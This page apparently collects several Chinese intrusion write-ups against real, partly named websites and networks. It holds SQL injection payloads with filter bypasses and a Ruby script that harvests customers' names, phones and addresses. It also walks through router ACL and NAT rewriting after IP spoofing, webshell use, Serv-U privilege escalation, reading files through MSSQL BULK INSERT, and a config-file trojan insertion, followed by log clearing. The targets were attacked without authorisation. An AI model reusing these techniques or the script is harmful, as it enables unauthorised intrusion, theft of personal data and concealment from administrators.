以下是小编整理的某商业网站渗透分析网站安全(共含8篇),欢迎阅读分享,希望对大家有帮助。同时,但愿您也能像本文投稿人“还不错”一样,积极向本站投稿分享好文章。
本次渗透分析仅针对WEB系统,考虑其他方面并没有直接可攻破的点
平台: Windows MSSQL IIS 6.0 测试层面: WEB应用程序-动易
由于本人对动易2006并不熟悉,虽然通过GOOGLE查了很多相关的漏洞信息,但是那些漏洞的发布日期已经有4,5年的历史了,只好先整体看看这个WEB的结构,通过首页发现除了注册和登录那里可以到有ASP脚本的踪迹外,其他地址都已经转换成了静态页面,于是注册一个测试帐号,登录进去,里面有些相关帐号信息设置和订单信息的项目,但是在帐号信息设置里没有发现比较明显可以造成漏洞的提交点,这个时候要变换思路了.
重新查看首页,中上部有一个搜索功能,于是马上提交一个单引号,测试返回结果令人振奋,结果如下:
Microsoft OLE DB Provider for SQL Server错误 '80040e14'
字符串 ' order by Hits desc' 之前有未闭合的引号,
/shop/proclass.asp,行 629
这该不会是WEB开发人员自己添加的功能吧,还是动易2006的功能,按道理动易2006经历了这么多的风风雨雨不会犯下愚蠢的错误的,这仅仅是一个猜测,我还没有下载源代码或者看代码文档作出合理判断。
但不管怎么说,这个SQL注入点是一个好兆头,既然是注入点,当然要测试一下一些基本的SQL语句,看能否得到一个敏感信息,于是提交‘ and 1=user--,结果返回空白页面,奇怪。。。难道有过滤?使用比较少见的’ having 1=1--有了返回结果,但是提示语法错误,可以肯定该WEB系统装了类似WAF或者有脚本过滤功能,搜索功能是通过POST提交参数,而且如果想通过自动化工具利用的话,也得抓包分析出其中的提交参数,于是乎请出WinSockExpert,得到路径和参数信息后,先用IE测试一下,结果令人很失望,GET方式过滤的比POST要更加严格,就连单引号已经被过滤,汗。。。填到NBSI里,不论是GET还是POST方式运行都提示错误,看来这个搜索功能的SELECT WERE有不可告人的语法哦,先放一边。
既然有此物也会有彼物的,请出伟大的GOOGLE帮忙吧,site:xxx.com filetype:asp,不错,有很多ASP的连接,其中www.xxxx.com/Shop/ShowTrademark.asp?ChannelID=100&SpecialID=4这个连接是最抢眼的,放入IE,在SpecialID=4之后加单引号,返回到首页,%100的肯定了有SQL注入过滤功能,但是别忘记POST是不能过滤的太严格的,不然用户也要提交一些有特殊符号的内容的,这就是我要钻空子的地方了,接下来用到了JCZ的注入工具,为啥用它呢,因为作者比较厚道,提供了一个查看DEBUG信息和一个自己构造SQL语句功能,可想而知作者是多么希望使用他工具的人不仅仅是会用工具,还是能理解原理的人。
在JCZ中,运行的结果出现了该WEB应用程序的数据库连接帐号是SA权限,支持多语句,数据库名,用户名一些基本信息,但是在进行到测试表名的时候出现了错误,说明被过滤功能阻挡了,怎么办???仅仅这些基本的信息是万万不能有啥突破的。
接下来通过查看JCZ的DEBUG信息,大概猜测过滤了哪些SQL语句,那么就要想办法绕过限制,JCZ的RunSQL功能是一个很好尝试的地方,单独的SELECT是无法执行了,于是想到了uion select的方式,测试结果是理想的,成功的绕过了限制,构造语句如下:/**/and/**/1=2/**/union%20all select%201,2,3,password,5,'a',7,8,9,10,11,'b',13 from PE_Admin—此语句的构造过程一波三折,首先字段数量不难点,纯属体力活,但是中间的几个字段注意类型,如果与前面SQL语句的类型不匹配就会发生错误,另外还有union 后面的all,如果不加会发生如下错误:不能以 distinct 方式选择 text、ntext 或 image 数据类型,这说明了在前面的SELECT语句后使用了DISTINCT的限制关键词
语法解释:SQL SELECT DISTINCT 语句,在表中,可能会包含重复值。这并不成问题,不过,有时您也许希望仅仅列出不同(distinct)的值。
关键词 DISTINCT 用于返回唯一不同的值,UNION 和 UNION ALL的区别,UNION在进行表链接后会筛选掉重复的记录,所以在表链接后会对所产生的结果集进行排序运算,删除重复的记录再返回结果。
而UNION ALL只是简单的将两个结果合并后就返回。这样,如果返回的两个结果集中有重复的数据,那么返回的结果集就会包含重复的数据了,了解语法后就很容易理解为什么要用union all了,因为关键词DISTINCT和UNION都有相同的取出重复值的功能,一起共处难免会让MSSQL难堪的:)
好了,通过上面语句我得到了后台管理员的用户名和密码,这里用XXX表示,那么就找后台路径去登录了,这里又是一个难点,我试过了常用的路径名,甚至动用了扫路径工具都无功而返,郁闷啊,思考好久,不如先放下?!看看这个IP绑定有哪些WEB吧,运气不错,有4个,其中一个WEB也使用动易2006,但是观察页面,和xxx不同的是,我根本看不到注册和登录的连接,于是通过xxx的路径信息,访问到了这个站的注册页面和登录页面,比较幸运的是,在我注册登录进去以后,在最下边发现了,后台管理的连接地址,根据这个地址我折回xxx访问后台,BINGO,原来这个服务器的WEB应用是同一个人或者组织维护的
但我满怀欣喜打开xxx的后台,正好登录的时候发现,在密码框之后还有一个管理员认证码,本来以为不就一个认证码嘛,我再注入得到就好了,但是通过查找动易文档,此管理认证码写到一个固定的配置文件中,只能有管理员才可查看和修改,一座大山突然出现在了我面前
痛苦之余,想了点别的,既然通过别的站点得到后台路径信息,那么可否通过xxx的注入点路径信息得到别的站点的管理员密码呢,但我访问的时候,又一次被深深的打击了一下,结果如下:对不起,你的服务器没有安装动易组件(PE_Common6.dll),所以不能使用动易系统。请和你的空间商联系以安装动易组件。
不能说一点收获也没有,至少我知道这个注入点是动易2006的一个组件造成的!
都已经可以执行SQL语句了,怎么可以就这样放弃,除了SELECT,我认为最好可以执行UPDATE,因为有这样一个事实:在基于WINDOWS 2003系统上,IIS6.0中,如果WEB路径的名字是一个X.ASP,那么在这个路径之下的所有任意类型的文件都会被当作ASP脚本解析,而且我查了动易2006有过这么一个漏洞,漏洞的要点在注册用户名的时候,没有过滤特殊字符点,导致可以注册一个X.ASP的用户名,然后通过访问user/Upload.asp?dialogtype=UserBlogPic&size=5,可以上传允许扩展名类型的文件上去,但内容可以是ASP类型的WEBSHELL,上传成功后,查看源代码,可以找到上传文件的路径信息。
这个事实阐述还是蛮长的,但是我眼前这个动易2006已经早就有了补丁,只允许字母和数字做为用户名,才能注册成功,但是如果我可以UPDATE更新我的用户名称X.ASP也可以达到目的吗,这叫间接实现老漏洞,呵呵,但我第一次构造好语句:;update/**/PE_USER/**/set/**/username='x.asp' where userid=xxx—提交后,HTTP返回无内容,又一次被过滤了,通过测试本地的MSSQL2000,update关键词是没办法拆分的,如果利用EXE(@sql),然后将@sql里用十六进制加密呢,通用过滤declare,cast,varchar等等所必需的元素,这条路也走不通,如果在update之前也加个/**/会怎么样呢,第二次构造好语句:;/**/update/**/PE_USER/**/set/**/username='x.asp' where userid=xxxx—哈哈,有内容返回了,我相信已经更新成功,但我再次通过邮箱登录该帐号以后,在帐号信息了,发现用户名已经是x.asp了,非常的不错,我上传了一个很小的WEBSHELL,为了过愚蠢的图片验证机制,开头加GIF89a,上传成功,查看源代码,又一座大山出现在我面前;路径是有x.asp了,但是后面竟然有5个数字,仔细一看,正好是我的userid,破坏了我当初想的通过x.asp执行WEBSHELL的思路了,我很佩服动易的开发人员,为了程序安全,增加了很多安全机制在里面,下面代码是通过注入点得到所有订单用户的敏感信息:
测试代码 Httpsql.rb:
Code:[Copy to clipboard]
require 'uri'
require 'net/http'
require 'socket'
require 'iconv'
class Httpsql
def initialize(url)
@url = url
@uri = URI.parse(@url)
@i = 5
end
def Postsql(sqlstr, userid, startid=1)
http = Net::HTTP.new(@uri.host, @uri.port)
headers = {
'Content-Type' =>'application/x-www-form-urlencoded'
}
(startid..userid.to_i).step(1) do |id|
print “#” + id.to_s
params_1 = sprintf(sqlstr, “Username”, “ContacterName”,id)
params_2 = sprintf(sqlstr, “Mobile”, “Phone”,id)
params_3 = sprintf(sqlstr, “ZipCode”, “Address”, id)
begin
resp_1 = http.post(@uri.path, params_1, headers)
self.wirtelog(resp_1, “1”)
resp_2 = http.post(@uri.path, params_2, headers)
self.wirtelog(resp_2, “2”)
resp_3 = http.post(@uri.path, params_3, headers)
self.wirtelog(resp_3, “3”)
rescue
@i += 1
sleep(@i);
retry
end
sleep(@i);
end
end
def wirtelog(resp, flag)
#puts resp.body
file = File.new(“userinfo.txt”, “a”)
if resp.body =~ /^
if flag == “1”
file.puts “============================================================”
file.puts “网站用户名: ” + $1
elsif flag == “2”
file.puts “手机号: ” + $1
else
file.puts “邮政编码: ” + $1
end
end
if resp.body =~ /
(.*?)<\/P>/
if flag == “1”
file.puts “真名: ” + $1
elsif flag == “2”
file.puts “座机: ” + $1
else
file.puts “联系地址: ” + $1
file.puts “============================================================”
end
end
file.close
end
end
if __FILE__ == $0
sqlsend = Httpsql.new(“www.xxx.com/Shop/ShowTrademark.asp”)
sqlstr = “?ChannelID=100&SpecialID=4/**/and/**/1=2/**/union/**/all/**/select/**/1,2,3,%s,5,'无',7,8,9,10,11,%s,13/**/from/**/PE_OrderForm/**/where/**/ClientID=%s--”
sqlsend.Postsql(sqlstr, ARGV[1],ARGV[0].to_i)
end
这个网络很大共有七个网管,现在当前位置是F网、朋友在B网、目标在A网,
朋友给的资料,目前接入internet的两台设备未知(假设未知的设备都是路由器),图2是该公司大体的网络拓扑图。掌握B网所有设备用户名密码(朋友之前嗅探到的)。除A网其它网络可以自由通信, A网内有公司重要信息所以不像其它网,它是不允许任何人访问的,路由不给予转发数据,也就是只进不出的网络,虽然现在的网络是外紧内松,但是想进入目标主 机还是有些难度。怎么跨过设备的限制到达目标呢!您还要向下看。现在首要的目的就是让router3给我们转发数据包。
首先尝试telnet登录路由,拒绝访问不能登录,我想也不能登录,应该是访问控制列表限制了。
现在我们首要目标拿下router3的控制权,为什么目标定位在router3呢!
我们现在知道他的登录密码;
我当前位置可以和B网直接通信;
Router3是A、B网络公用的,应该两个网管都有权限登录;
这一点也是最重要的,只有router3给予数据转发才可以和目标主机通信;
个人认为router3是最佳路线,现在假设一下,如果B网管理员所管理的设备只有他本身所用的IP或TFTP Server(兼DHCP Server)才可以登录设置,那么有如下思路可以完成入侵。一般来说管理员主机一定可以登录这台路由器的,网管主机都不可以登录设备那么谁为维护网络 呢!
1、直接得到B网管理员主机的一个CMDShell来登录设备。
2、得到管理员同网段一台主机的CMDShell,从而利用ARP欺骗来telnet目标路由。
3、得到B网其它网段中可访问外部网络一台主机的CDM Shell,伪装CDM Shell主机IP地址,必要情况伪装IP+MAC地址来欺骗路由器,(机会高达到50%)。
经过分析拿B网的DHCP服务器(172.16.101.25)开始,选择突破点也是很重要的,DHCP服务器为了提供这个网段的服务他是暴露在相对 外部的,而且不在VLAN的管辖中,还和网管在同一交换机下,而且听朋友说他们公司PC几乎不打补丁,还有很多员工不知补丁为何物,这也给入侵带来及大 的方便。利用服务器的WEB木马上传一些流行的溢出程序,直接拿个溢出程序溢出他的DHCP服务器,(最后才知道的溢出程序对这个主机都有 用)成功得到一个System权限的CMDShell。
革命尚未成功,同志们还须努力啊!“下载”我们肉鸡一个反弹的木马,我们的肉鸡是不能主动连接DHCP服务的,好像有点费话。现在这个主机就是我们在 内网的一个接入点,放弃我们刚才控制的那个WEB主机,利用反弹木马开的个CMD。telnet一下路由,%connection closed by remote host!还是连接失败,不能登录路由器,看样只有172.16.101.15这台主机(管理员IP)可以登录了,我们看一下登录他的交换机OK不(一般 工作组交换机权限设置不会那么BT)。
telnet 172.16.101.253 //交换机管理地址
Password:
center>enable
Password:
成功登录,show mac-access、show cdp neighbors、show arp一些命令判断管理员对应的结口,管理员的IP对应的是FastEthernet 7/1,这个时候要用到IP地址的欺骗,在此感谢EST长的最难看的哥哥。
#interface FastEthernet 7/1
#shutdown
当然,这要等网管离开的时候才可以,这就要内外结合了。这个时候172.16.101.15这台主机在网络上以消失了,我们试一下路由是否允许网管的主机登录,把自己的IP改成172.16.101.15,输入:
netsh >interface ip
netsh interface ip >dump看一下接口配置信息
netsh interface ip >set address name = ″本地连接″ source = static addr = 172.16.101.15 mask = 255.255.255.0
这时候当前主机地址改为172.16.101.15,现在这个主机会和我断掉,但只是一小会,我们的反弹木马一会就能上线。一般重新变改IP地址要发 个ARP包告诉网络其它主机,大概意思是我的IP是172.16.101.15,MAC地址是00-00-00-00-12-34,以后有发往 172.16.101.15地址的数据包都有我来响应。交换机刷新地址表后这台主机伪装成功。在telnet登录路由器,如图2
show running-config看一下配置信息,把路由配置信息COPY到记事本在分析,找到如下配置信息。
access-list 99 172.16.8.88 0.0.0.0 //A网管理员地址
access-list 99 172.16.101.15 0.0.0.0
访问列表99限制只有以上两个IP可以登录路由,看来是这个家伙在作怪,
删除99访问列表,在添加99访问列表:
#access-list 99 172.16.68.88 0.0.0.0
#access-list 99 172.16.101.15 0.0.0.255 //改成172.16.101.0/24网段都可以登录
#line vty 0 4
#access-class 99 in
退出路由系统,把自己IP改回来,把交换机设置也改回来以免网管回来被发现。
center(config)#interface FastEthernet 7/1
center(config-if)#no shutdown
简单的清理一下留下的痕迹,退出他们的网络来分析一下网管是怎么配置的路由,在路由配置信息中有几条重要信息。
ip nat pool NO.1027 10.255.200.1 10.255.200.105 netmask 255.255.255.0
ip nat inside source list 10 pool NO.1027 overload
access-list 10 permit 172.16.7.0 0.0.0.255
access-list 10 permit 172.16.8.0 0.0.0.255
……
router eigrp 10
真是不敢恭维网管的技术,一条访问列表可以搞定的事,非要分成N个访问列表来描述。到这时才明白为什么朋友不能访问目标主机,因为A网边界路由器为其 作NAT的地址转换,将B类地址转换成A类地址,并且有访问列表限制。现在要使当前主机和目标主机在“堡垒”中建立一条专用的“线路”。我这对路由的配 置不是很熟悉,也不敢太多的尝试,以免被网管发现,但是我们可以“重新”配置一下他的eigrp协议,使内部的地址完全暴露在外边,但此办法太容易让网 管发现,但是当时没想出别的办法来。
#clear ip nat translation *
#no ip nat inside source list 10 pool NO.1027 overload
#no …… //去掉他的访问列表及NAT配置信息
#router eigrp 10
(config-router)#network 172.16.2.0 0.0.0.255
(config-router)#network 172.16.3.0 0.0.0.255
(config-router)#network …… //把所有的网段加进去
#reload 10 //10分钟后设备自动重启
现在路由器就可以为我们转发数据包了,并且在10分钟自动重启使更改的的配置失效,我们现在只差一步就大功告成了,现在须要在我控制的那台主机到目标主机创建一条干线使我们的数据包可以直接到达目标主机。
show cdp neighbors得到如下信息:
Device ID Local Intrfce Holdtme Capability Platform. Port ID
Router3 Fas0/12 176 R 2621 4
在交换机中添加VLAN 13,(目标主机的VLAN号),进入Fas0/12端口, “switchport trunk all vlan add 13 ”,在trunk中添加VLAN13,使这条线路可以通过VLAN13的数据,没有必要改变自己的VLAN号,路由器现在没有访问列表来控制我们的数据 流。这个时候我们ping 172.16.8.120目标主机物理IP地址数据包可以到达了。
这次入侵也接近尾声了,和以前一样还是溢出后安装一个反弹木马,使他可以主动连接我的肉鸡,当然这要在10分钟内搞定,否则要重新进路由改变他重启的 时间,备份他硬盘上的数据,备份肉鸡上的数据,最后就是清理一下入侵的痕迹。这次入侵大约10天才完成,因为要等到特定的时间才可以改变他的网络设备配 置,比如改变路由器的访问列表进一定要等到下班时间,大多用户不使用网络时、而目标主机还在使用网络时、网管还没有关闭设备时,也就是要和网管打个时间 差。
本文经过N次的筛选终于从万字的文章精减出此文,可读性、实用性一定会有不同程度上的衰减,本次入侵没有什么新的技术,主要说怎样绕过内部网络设备的限制,只不过是一些经验的叠加,针对网络设备入侵这也算很初级的。
当时少写了个步骤,少了是不会成功的,仔细看的朋友一定能看出来。
转自无才牛。。。
一个朋友准备上某职业技术学校,说该学校号称是国家级重点中等职业学校,只要进入该学校每个学生即可享受3000元国家助学金,该学校网站如图1所示,目前要了解一个学校,只有两种方式,一种是进行实地考察,另外一种就是通过网站来了解,既然朋友给了一个网站就就看看该网站的安全情况如何,
图1 某职校网站
一、信息收集
1.获取IP地址信息
直接打开DOS窗口,然后使用“ping www.**j.com”获取该网站的真实IP地址,如图2所示,通过ping命令知道该主机无丢包率,延迟时间为49。
图2 获取IP地址信息
说明:
使用ping命令一方面是为了获取IP地址,另外通过延迟时间来判断网络速度快慢,也便于后期对该服务器的一些口令检测,例如mysql、mssql、ftp以及pop3等口令的检测。
2.初步获取端口开放情况
使用“sfind.exe Cp 61.*.*.96”命令来获取该职校服务器的端口开放情况,如图3所示,该服务器开放了21、80以及3389端口,通过端口扫描可以初步判断为该服务器为Windows系列。
图3 获取端口初步开放情况
技巧:
(1)3389端口一般为远程终端服务开放端口,只要见(该端口可以初步断定为Windows系列主机。
(2)可以先使用3389远程终端连接器连接该IP地址进行登录尝试,如果登录成功,可以看到该操作系统是Windows Server还是Windows Server。本例中通过3389远程终端连接器连接,获取该系统为Windows 2000 Server操作系统。
(3)可以使用superscan以及X-scan等扫描软件扫描端口,X-scan扫描软件个头比较大,扫描操作相对复杂,扫描结果比较全面。
说明:
Superscan3.0版本扫描的结果可以直接访问80、21以及23等服务。二、口令检测
1.扫描口令
根据个人爱好,我一般是脚本检测和口令检测同步进行,在肉鸡上直接运行hscan,设置好参数开始扫描,在本次检测中比较幸运,扫描出该主机IP地址存在弱口令,在本地运行“CuteFtp8.0Professional”,单击“Site Manager”在其中新建一个站点,输入该主机IP地址和和获取的用户名以及密码,最后单击“连接”,进行登录尝试,如图4所示,登录成功。
图4 使用CuteFtp8.0Professional连接Ftp服务器
2.信息分析
通过“CuteFtp8.0Professional”软件对该Ftp服务器的当前用户目录中的内容进行查看,在图4中,我们可以看到该Ftp目录中存在conn.asp数据库连接文件,在该目录还可以看到一个比较熟悉的文件newasp.asp(木马程序常用的一个文件名称)文件,将以上文件下载到本地,并通过UltraEdit-32编辑器打开conn.asp文件,如图5所示。知道该Web站点使用的是Access数据库,数据库路径为根目录下的“database”,数据库名称为“l***88.asa”,该网站系统使用的是PowerEasy,即使用动易网络论坛系列。
图5 查看conn.asp文件内容
3.获取Webshell
查看conn.asp文件后,继续查看其它文件,在newasp.asp文件中我们发现如图6所示,可以很清楚的看出该文件就是一个Webshell,从中还可以看到该Webshell的密码为“h***56”。既然获取该Webshell后,那就直接在该网站输入IP地址后进行尝试。
图6 获取Webshell地址三、实施控制和渗透
1.获取Webshell
在浏览器中输入“网站地址+对应的Webshell地址”,在本例中输入“www.n**.com/newasp.asp”,如图7所示,该Webshell可以正常运行,说明该Webshell可用,
图7 获取Webshell
2.通过Webshell查看文件
在Webshell中输入密码后单击“登录”按钮,验证通过后,如图8所示,可以正常使用该Webshell,通过该Webshell可以看到该网站下的所有文件,通过Webshell可以下载、删除、移动以及编辑等操作。
图8 通过Webshell查看文件
3.通过Serv-U提升权限
在该Webshell中单击“Serv-U提升权限(超强版)”,进入提升权限界面,在该界面中使用默认设置即可,然后单击“提交”按钮将添加密码为“pass13”,用户名称为“user13$”的用户到管理员组中,如图9所示。
图9添加用户提升权限
说明:
(1)在使用Serv-U提升权限时,一般采用Webshell默认的用户名和密码为佳。(2)如果服务器口令有强制性设置,则在添加用户密码时需要满足复杂性要求,即要求满足大小写字母、特殊字符、数字以及位数等要求。
4.提升权限成功
如图10所示,提升权限成功后会给出相应的提示,不过需要注意有时候即使显示成功也不一定添加用户成功。
图10 提升权限显示成功
5.登录服务器
打开远程终端登录器(mstsc.exe),输入刚才添加的用户名和密码,进行登录尝试,登录验证通过后,成功进入该服务器,如图11所示,在该服务器上查看管理员用户组时发现除刚才添加的用户外,还可以看到“iis_helper”用户也为管理员组,通过查看该用户密码修改时间,获取该用户是10月28日添加的,查看newasp.asp文件的时间是8月11日,可以判断该服务器可能在208月就曾经被入侵过。
图11登录服务器五、简单的安全加固
1.使用“360安全卫士”进行简单安全加固
在该计算机上发现安装有“360安全卫士”,打开“360安全卫士”对系统进行一些简单的安全扫描,如图17所示,在恶意插件扫描中,一共发现有9个,将其清除,修复系统存在的安全漏洞。后面还使用360卫士清理启动选项等,对该服务器进行简单加固。
图17 使用“360安全卫士”进行简单加固
2.使用杀毒软件清除系统中的病毒
使用MacFee杀毒软件对系统中的磁盘进行扫描处理,如图18所示,发现系统中存在一些病毒,该文件所在目录为一个Ftp匿名登录目录,可以猜测有可能是入侵者利用社会工程学在进行挂马。
图18 使用杀毒软件进行杀毒
六、总结
本次安全检测仅仅通过扫描Ftp、Mysql以及MSSQL弱口令就获取了某职业学校的控制权限,如果有时间和耐心应该可以渗透该内部网络。本次安全检测的关键就是通过“CuteFtp8.0Professional”软件获取了网站的一些关键文件,包括Webshell,直接通过Serv-U就提升权限成功,进而成功控制系统,就个人经验来说,可以采取以下一些措施来加固系统。
(1)重新更换系统中的所有密码,删除多余的管理员。
(2)对系统进行杀毒、木马检测、端口查看、网络连接等安全检查。
(3)对网站代码进行安全检测,查看代码中是否包含后门和木马代码。
(4)安装防火墙并及时升级系统防火墙、系统补丁。
(5)更改3389端口为其它端口,在事件中增加安全审核,并仅仅授权管理IP地址,即仅仅某一个网段或者某一个IP地址才能访问3389。
(6)严格控制Ftp用户以及目录,如果没有特殊的需要,尽量使用Windows自带的Ftp服务。
目标站点是老Y文章管理系统v2.5的,在网上找了下,目前基本上没有什么可直接利用的漏洞,于是开始旁注
上ip.468w.cn/查了下。服务器上150个站,用super injection导入全部站点后批量扫描注入点,很快拿到了服务器一个asp的shell,可是权限很低.几分钟过后又拿到同服另外的一个.net站的 shell,初步看了下,星外的虚拟主机,设置得比较安全,除了当前站点目录和c:\windows\temp可写入,找了许久都没找到一个即可写也可执 行的目录。这样信息获取的就比较少了,所幸在注册表里HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT \INSTALLFREEADMIN\11找到了星外虚拟主机配置信息 mssql sa密码 (32位md5加密,感谢sht同学帮我查询收费记录)
却没看到诸如freehost之类的数据库,sa被降权了,mysql 的root密码也是一样的可惜也被降权了,都是独立帐户启动的数据库.mssql backupdata时除了temp目录可写,其它目录都不能写,xp_cmdshell,xp_dirtree,xp_oacreate,等那些存储过 程都不可用,上传相关dll文件尝试恢复提示拒绝访问,不过还可以用xp_subdirs列出d:\freehost的所有子目录来。但是目标web路径 没有用域名这类的作为名称,花了大半天的时间才找到目标站的路径。大致方法就是通过whois查到管理员的qq邮箱,再通过搜索qq,找到管理员常用用户 名xxx336,再在列出的子目录里找到一个xxx336的目录,exec master..xp_subdirs ‘d:\freehost\xxxx336\web’ 的确老y文章管理系统的目录结构不过后台目录被改了这下也暴露出来了,目前知道后台地址,web目录,
Qq,常用用户名,把这些整理成一字典 进行后台密码和ftp穷举,也失败了。于是想打数据库的主意,老Y文章管理系统的配置文件为/inc/config.asp,的参数中有数据库路径,于是 在网上相关 mssql读取文件内容的方法,总算是找到了,也许牛牛们早就知道了,但我还是第一次用到,拿出来分享下希望对没有接触过的同学有帮助以免走弯路,
用查询分析器执行如下语句
Use xxx120;–(这里是随便选的一个数据库) drop table cmd; create table cmd (a text); BULK INSERT cmd FROM ‘d:\freehost\xxx336\web\inc\config.asp’ WITH ( FIELDTERMINATOR = ‘\n’, ROWTERMINATOR = ‘\n\n’ ) select * from cmd 这样就成功读出了d:\freehost\xxx336\web\inc\config.asp文件的内容,很惊讶。
下载数据库后找到管理员表,密码字符串只有14位,下载了套程序看了下相关代码Mid(md5(Admin_Pass,32),4,18),先经过32位 md5密码然后从4位开始往后取18位 。密码不可逆,看到这个就 了。看了看后台验证文件admin_check.asp, 很鸡肋cookies欺骗。利用起来很麻烦。于是在下载到的数据库的普通用户表中查询和管理员表的里密码相似的用户,结果还真找到了个用户,
由于普通用户表的密码是16位md5加密的,把密文拿到cmd5.com很快就查询出来了明文密码,用这个密码尝试登陆后台,还真成功了,
拿 shell 就简单了,后台有数据库备份功能。至此 大功告成!
现在入侵网站没以前那么简单了,在注入漏洞和上传漏洞刚出现的时候,用这两种方法入侵网站的成功率是最高的,有将近70%左右的网站都可以利用注入漏洞和上传漏洞轻松搞定,注入漏洞在国内流行差不多二年多了,只要是做网站维护和服务器管理的人,几乎都知道什么是注入漏洞,而且利用通用防注入脚本可以轻松堵住有注入点的网站,用法简单,网上到处都有下载。现在入侵网站不再是拿出一个注入工具,点几下鼠标就行了,所以我们入侵的思路也要改变一下,平常也要多积累各种程序的漏洞,入侵的时候一定会更加顺手、更加顺利。接下来,大家就和我一起进入今天的渗透过程吧!
寻找漏洞篇
荆网,荆门市的门户网站,首页上有二手供求、房产信息、图书影视、人才招聘、社区等20几个栏目。新闻系统全部是静态页面,注入是不可能的,后台好像也被修改了,用扫描后台的工具扫了一遍,没有结果,用Google搜索也没找出来,看来我们只能从其它的方面入手了。
一般的大型网站都有自己的流量统计程序,方便管理员和网站经营者查看网站的流量,为网站推广提供一定的依据。下面,我们来找找看荆网有没有自己的统计程序,用Google搜索site:cnjm.cn inurl:count,如图1所示。
荆网果然有自己的统计程序,还是IT学习者网站访问统计系统。前段时间,这套程序暴出了后台拿WebShell的漏洞,但前提是要拿到管理员密码。一般这种门户网站,管理员都会改密码的,先试下看看吧。这套程序的默认密码是ITlearner,在密码处输入ITlearner,返回密码错误,果然改密码了。习惯性地试了下网站的域名cnjm,竟然成功进去了,如图2所示。
拿WebShell篇
马上到网上下载了一套IT学习者网站访问统计程序,
利用这套程序的漏洞拿WebShell,网上有很多教程,但是我还没有拿过,先在本机上搭建好程序的运行环境,然后再按网上讲的方法进行测试。一般有什么漏洞出来,最好是自己下载一套程序,在本机上测试,只有先拿下自己机子上的程序,才可能顺利拿到服务器上的程序,自己在本机测试也会对程序的漏洞理解更深,有助于我们进一步学习。在本机测试成功拿到WebShell后,我明白这套程序会把修改配置的内容写入config.asp文件,只要我们在修改配置里插入一句话木马就可以搞定了,因为修改配置里限制了文本框的大小,所以我们要把源代码保存一下。搜索“默认为100条”关键字,把这行文本框的maxlength的值修改为100,value的值修改为“100%>
拿服务器篇
成功连接后,我上传了老兵的站长助手,先看看服务器的权限设得如何,如图4所示。Wscript.shell和FSO组件都能用,而且C盘还可以浏览,应该可以拿下来。上传net.exe和netstat.exe两个工具到C:\Documents and Settings\All Users\Documents目录下,这个目录默认是everyone完全控制的。查看了一下端口列表,3389终端端口开了,还有Serv-U的本地43958端口。在本地用FTP连接,发现Serv-U是6.0版的,而且3389也可以成功连接。了解了这些情况,现在我们只要加个管理员就行了。上传Serv-U的本地提权工具,马上加了一个管理员,用远程桌面连接器成功登录,如图5所示。
IIS管理器把网站全部显示出来了,主站www.cnjm.cn也在其中。到此为止,这次渗透就成功完成了,拿下了荆网的服务器。接下来,删除账号,清除日志,然后给管理员留了言,我就下了。
渗透总结
这次入侵,我利用一个统计程序的小漏洞就轻松搞定了一个市的门户网站。管理员们要注意了,在使用密码的时候,不要用过于简单,用域名做密码,别人一猜就能猜出来,你方便了,那入侵者就更方便了!
笔者的一个朋友喜欢上一个著名的胎教网(www.taijiaobb.cn),在该胎教网上可以听取胎教音乐和胎教故事,网站主要针对两种用户提供服务,即普通用户和VIP用户,VIP用户需要付出150大洋,然后可以优先听取胎教音乐和胎教故事,如果是普通用户,则在某些时段无法给宝宝享用,于是就萌发了将这些mp3等媒体文家下载到本地来,通过研究分析,本人找到了两个方法来获取这些文件,下面就将研究结果跟大家分享。
一、本地临时文件夹获取
通过分析音乐文件的播放时间和播放方式,可以得出该网站提供的媒体文件不可能在服务器上直接播放,如果在线直接播放将导致成本过高,且技术实现难度大,维护起来也不方便,因此可能的途径有两种,一种是媒体文件在服务器上,另外一种媒体文件在网络上。两种方式都是将媒体文家下载到本地进行播放,顺着这种思路,理所当然的去临时文件夹中寻找这些媒体文件。
1.快速获知临时文件夹内容
运行金山安全百宝箱,单击“垃圾文件清理”,单击“网页历史文件夹”,如图1所示,软件会自动按照文件大小进行列表,在该列表中就有胎教网所下载的媒体文件。选中文件名,右键单击,然后选中打开文件所在文件夹可以快速进去该媒体文件所在的具体位置。
图1 快捷获取临时文件夹下的内容
说明:
(1)Windows 系统默认会隐藏系统文件,因此如果想要查看这些文件还需要进行文件夹设置,在资源管理器中单击“工具”-“文件夹选项”,如图2所示去掉“显示系统文件夹的内容”和“隐藏受保护的操作系统文件(推荐)”前面的勾,同时在隐藏文件和文件夹中选中“显示所有文件和文件夹”选项,单击“确定”按钮完成设置。
图2设置文件夹选项
(2)命令行方式进入。以默认管理员身份进入则执行以下命令:
Cd C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5
start.
2.查看临时文件目录中的内容
在“Content.IE5”目录下选择任意一个文件夹,在本例中选择“P423WU53”接着会出现一个提示“该页包含未知的潜在安全隐患,是否继续?”选择“是”,如图3所示,从中可以看到一些临时的文件,
在该文件目录中主要是网页临时生成的文件、图片、JS脚本以及媒体文件等。如图4所示,在该文件夹中出现了曾经播放过的胎教故事声音文件“长发妹.mp3”。
图3查看临时文件目录中的内容
图4 获取媒体文件
3.获取并整理下载文件
回到上一级Content.IE5目录,选中这些目录将其全部删除掉,然后再次打开胎教网
进入到胎教故事页面“www.taijiaobb.cn/bbs/forum-271-1.html”,随机听取一个胎教故事,然后再到Content.IE5目录刷新并查看,发现其中生成了数个临时目录。依次查看临时目录文件,在查看到“EJMHP3SC”时,其中就有正在播放的媒体文件。按照这个方法一个个听完,然后到临时目录中将其复制出来即可。
技巧:
(1)突破VIP会员限制。在播放过程中经常会遇到VIP会员占用通道,请稍后重试。多次刷新即可正常访问。
(2)获取文件的正常播放时间。该网站媒体播放文件是即时下载即时播放,即下载多少播放多少,要获取正确的媒体文件需要完整听取整个文件,为了保证获取完整的媒体文件,因此需要进行时间验证。打开胎教故事后,如图5所示会显示文件的播放时间,播放时间由两个部分组成,前面是已经播放的时间,后面是文件的整个播放时间。记住这个播放时间,然后在临时文件目录中找到对应的媒体文件,选择查看文件“属性”-“摘要”,在摘要标签下面的持续时间会显示该文件的整个播放时间,如果两个时间一致获知相差1秒,则这个文件下载完整。
图5获取媒体文件完整播放时间
图6 比对下载文件的播放时间
3.快速下载多个文件
使用前面的方法要下载所有的文件还是比较费时,通过研究可以同时打开多个媒体文件,使其进行播放,播放后即可停止,而该文件会继续进行下载到本地临时文件。
